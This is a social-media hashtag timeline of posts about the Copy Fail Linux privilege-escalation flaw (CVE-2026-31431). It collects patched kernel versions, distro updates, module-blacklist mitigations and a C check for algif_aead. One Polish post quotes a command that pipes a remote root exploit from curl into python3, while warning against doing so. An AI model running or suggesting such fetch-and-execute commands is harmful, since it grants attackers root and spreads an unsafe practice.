Elektrine
Log in Register

#copyfail

19 posts · Last used 52m

Back to Timeline
@grono@mastodon.com.pl · 53m ago
Docker Engine is safe against CVE-2026-31431 now. Patch ASAP: https://github.com/moby/moby/releases/tag/docker-v29.4.2 #docker #containers #linux #copyfail
0
0
0
@adhisimon@mastodon.kodesumber.com · 8h ago
Before trying to mitigate, it turns out my #fedora 43 workstation (not upgraded to 44 yet) had already updated and not vulnerable to #copyfail
0
1
0
@adhisimon@mastodon.kodesumber.com · 8h ago
Fedora had released Fedora CoreOS 43.20260413.3.2 on "stable stream" few hours ago to patch against Copy Fail. Upgraded packages: kernel-6.19.11-200.fc43.x86_64 ⟶ 6.19.12-200.fc43.x86_64kernel-core-6.19.11-200.fc43.x86_64 ⟶ 6.19.12-200.fc43.x86_64kernel-modules-6.19.11-- 200.fc43.x86_64 ⟶ 6.19.12-200.fc43.x86_64kernel-modules-core-6.19.11-200.fc43.x86_64 ⟶ 6.19.12-200.fc43.x86_64 You can wait your zincati service schedule to upgrade automatically, or you can run sudo zincati-update-now to upgrade immediately. #copyfail #fedora #fcos #coreos
0
0
0
@veronica@mastodon.online · 12h ago
Copy Fail (CVE-2026-31431) has just been patched on Debian 13, with kernel version 6.12.85-1 from trixie (security). https://security-tracker.debian.org/tracker/CVE-2026-31431 #CopyFail #Debian #Linux #InfoSec #CVE
15
0
16
@tankgrrl@hachyderm.io · 15h ago
No warranty implied, use at your own risk. But this short C program can check if your Linux machine is still vulnerable to Copy Fail (there's also this page with python code from our friends in Estonia https://docs.hpc.ut.ee/public/cve-2026-31431/ ) Output includes "ARE available" or "NOT available" Again: compile and run at your own risk. Don't just trust me blindly. Read the code. #CopyFail #CVE-2026-31431 ============== #include #include #include #include #include #include int main(void) { int sock; struct sockaddr_alg sa; // Prepare sockaddr_alg for AEAD/GCM memset(&sa, 0, sizeof(sa)); sa.salg_family = AF_ALG; strcpy((char *)sa.salg_type, "aead"); strcpy((char *)sa.salg_name, "gcm(aes)"); // Try to create AF_ALG socket sock = socket(AF_ALG, SOCK_SEQPACKET, 0); if (sock == -1) { perror("socket(AF_ALG, aead)"); printf("algif_aead functions are NOT available (AF_ALG socket creation failed).\n"); return 1; } // Try to bind to AEAD/GCM if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) == -1) { perror("bind(AF_ALG, aead, gcm(aes))"); printf("algif_aead functions are NOT available (bind failed).\n"); close(sock); return 1; } printf("algif_aead functions ARE available (AF_ALG AEAD bind succeeded).\n"); close(sock); return 0; }
2
0
0
@rysiek@mstdn.social · 13h ago
A lot of people are apparently happily running a script clearly marked as a root exploit from some random website using curl | bash :blobsweat: Some do inspect the script, but then still run it using curl | bash anyway. :thaenkin: Incidentally, this very relevant blogpost about detecting curl | bash and serving different scripts based on that is almost exactly a decade old: https://web.archive.org/web/20230318063325/https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/ #CopyFail #InfoSec
31
0
48
@matthew@social.retroedge.tech · 13h ago
Question on the #CopyFail Linux vulnerability: If "lsmod | grep algif_aead" returns nothing, is the vulnerability not exploitable? Most of my Linux machines are running older, non-patched kernels, but it doesn't seem like the affected kernel module is active... so does that mean a system that returns nothing for "lsmod | grep algif_aead" is not at risk for this exploit? #Linux
0
0
0
@harrysintonen@infosec.exchange · 1d ago

Mitigation to #CVE_2026_31431 / #copyfail :

  • If kernel config has CONFIG_CRYPTO_USER_API_AEAD=m:

echo “install algif_aead /bin/false” | sudo tee /etc/modprobe.d/disable-algif.conf; sudo rmmod algif_aead

  • If kernel config has CONFIG_CRYPTO_USER_API_AEAD=y:

Add “initcall_blacklist=algif_aead_init” to the kernel command line and reboot.

https://www.openwall.com/lists/oss-security/2026/04/30/2

14
0
21
Boosted by Greg Bell @ferrix@mastodon.online
@alexanderkjall@mastodon.social · 18h ago
Today I have spent way too much time handling the https://copy.fail situation #copyfail The persons who discovered it didn't notify the distribution security list, so no patched kernels was available for people to install when they released it. But they did have time to write an exploit, and thought it was a good idea to distribute that on day one, before vendors had time to provide patches. I'm not very impressed with xint.io, I guess it's the marketing department that runs the show.
59
0
77
@nacho@frankenwolke.com · 21h ago
Si sois sysadmins de Linux mejor no hagáis planes para el puente... https://copy.fail/ #copyfail #cve_2026_31431
11
0
17
@data0@indieweb.social · 21h ago

I couldn’t find a list of #Linux #kernel versions that include a patch for #copyfail, so I dug into the commit log and made one. Make sure you’re using at least the following version of your branch to mitigate against copyfail:

  • 7.0-rc7 (any stable 7.x is safe)
  • 6.19.12
  • 6.18.22
  • 6.12.85
  • 6.6.137
  • 6.1.170
  • 5.15.204
  • 5.10.254

See https://copy.fail for more info about the #exploit.

#privilegeescalation #vulnerability #cryptography #linuxadmin #sysadmin

3
0
2
@Viss@mastodon.social · 1d ago
#copyfail just to chime in on the copyfail thing, while, yes, it is a very big deal, the prerequisite is that you have a shell on the box you wish to exploit. so keep that in mind when doing risk register stuff. attackers will aim for shit like jumpboxes, shared hosting environments, multi-tennancy environments, and places they can get a shell, then move laterally to get you. shops doing yolo devops are gonna get targeted, and I wouldnt be surprised to see openclaw malicious skills too
22
0
13
In reply to
@Viss@mastodon.social · 1d ago
right now, every single remote code vuln that will lead to command injection or rce will make this #copyfail thing a very very big deal. so all those qa servers and staging servers and test boxes you think nobody gives a shit about that are just flapping out there in the public, not being logged, not in the siem, not getting alerted on, not getting patched? all those are gonna catch the "oops attackers overwrote sshd to steal creds" disease. or cryptominers. or proxies.
19
0
9
@whitequark@social.treehouse.systems · 22h ago
#copyfail is why the Forgejo Actions runner service i'm setting up will be using kvm and single shot VMs rather than containers
32
0
3
@thadah@blahaj.zone · 22h ago
CopyFail in action 6.19.11-zen1-1-zen running on Garuda Linux #copyfail
0
1
0
@niebezpiecznikbot@mastodon.com.pl · 23h ago
Masz Linuksa? To go szybko załataj! Ujawniono atak na wszystkie Linuksy wydane po 2017 roku. W sieci pojawił się też kod exploita. Uruchomienie go na podatnej maszynie daje atakującemu prawa roota. Szczęście w nieszczęściu: ta podatność to Local a nie Remote Privilege Escalation. Mimo to, polecamy szybkie wgranie aktualizacji wszystkim, nie tylko adminom maszyn na których pracuje wielu użytkowników lub hostowane są kontenery. Jak sprawdzić, czy jesteś podatny? Aby zweryfikować, czy Twój system jest podatny, wystarczy uruchomić ten 732 bajtowy skrypt Pythona. Na szybko można wykonać poniższe polecenie — po prostu skopiuj je i przeklej do terminala z poziomu zwykłego użytkownika. Jeśli po jego uruchomieniu zobaczysz uid=0(root) i zostaniesz rootem, to jesteś podatny na atak: curl https://copy.fail/exp | python3 && su Skopiowałeś i przekleiłeś bez sprawdzenia co jest pod URL-em? Błąd. Nigdy tego nie rób! “Pajpowanie” kodu z internetu do shella to proszenie się o kłopoty. I nie — wejście przeglądarką na URL i sprawdzenie kodu nie wystarczy, bo złośliwa strona może serwować Twojej przeglądarce co innego niż curlowi pod tym samym adresem (tzw. User-Agent cloaking). Poprawne zachowanie to lektura wyświetlonego kodu pod kątem złośliwych instrukcji (jeśli sam nie potrafisz tego ocenić, poproś o pomoc swojego asystenta AI) a potem skopiowanie kodu do lokalnego pliku i dopiero wtedy jego uruchomienie w interpreterze Pythona. Na marginesie, jeśli chcesz nauczyć się testować swoje środowiska pod kątem różnych podatności, dziur i ataków, to wpadnij na nasze bestsellerowe, szkolenie z testów penetracyjnych pt. Bezpieczeństwa Sieci i Systemów Komputerowych. Przez 3 dni hakujemy tam na różne sposoby różne maszynki, pokazujemy techniki i narzędzia, dzięki którym jesteś w stanie sprawdzić swoje środowisko pod kątem różnych ataków i w konsekwencji znacznie [...] #CopyFail #Linux https://niebezpiecznik.pl/post/copyfail-linux-exploit/
0
0
0
@astraleureka@social.treehouse.systems · 1d ago
I deobfuscated the #copyfail exploit and fixed up the payload to run under Alpine: https://astr.al/notes/2026-04-29_copyfail/
16
0
21
@selea@social.linux.pizza · 1d ago
The #copyfail exploit is not fun...
0
0
0
@darkrat@chaosfurs.social · 1d ago

Holy. Fucking. Fuckballs.

This exploit is… insane.

An unprivileged local user can write 4 controlled bytes into the page cache of any readable file on a Linux system, and use that to gain root

https://copy.fail/

#copyfail #linux

119
7
111

You've seen all posts